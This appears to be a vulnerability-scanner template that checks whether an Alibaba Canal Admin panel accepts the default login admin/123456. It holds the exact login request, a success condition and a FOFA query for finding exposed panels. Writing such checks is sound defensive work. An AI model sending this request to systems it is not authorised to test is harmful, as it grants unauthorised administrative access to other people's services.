漏洞描述
An Alibaba Canal default login was discovered.
FOFA: title="Canal Admin"
id: alibaba-canal-default-password
info:
name: Alibaba Canal Default Password
author: jweny
severity: high
verified: true
description: |
An Alibaba Canal default login was discovered.
FOFA: title="Canal Admin"
reference:
- https://github.com/alibaba/canal/wiki/ClientAdapter
tags: alibaba,default-login
created: 2023/06/24
rules:
r1:
request:
method: POST
path: /api/v1/user/login
headers:
Content-Type: application/json
body: '{"username":"admin","password":"123456"}'
expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
expression: r1()